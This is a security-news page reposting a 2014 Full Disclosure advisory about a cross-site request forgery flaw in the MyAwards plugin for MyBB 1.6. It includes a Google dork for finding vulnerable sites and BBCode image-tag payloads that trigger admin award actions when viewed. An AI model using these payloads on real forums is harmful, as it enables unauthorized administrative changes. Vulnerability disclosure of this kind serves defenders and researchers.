HackDig : Dig high-quality web security articles for hackers

MyBB 1.6 - MyAwards CSRF

2014-08-25 21:10
# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC(set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Source: 76/guA/4102/erusolcsidlluf/gro.stsilces

Read:4080 | Comments:0 | Tags: Csrf

“MyBB 1.6 - MyAwards CSRF”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud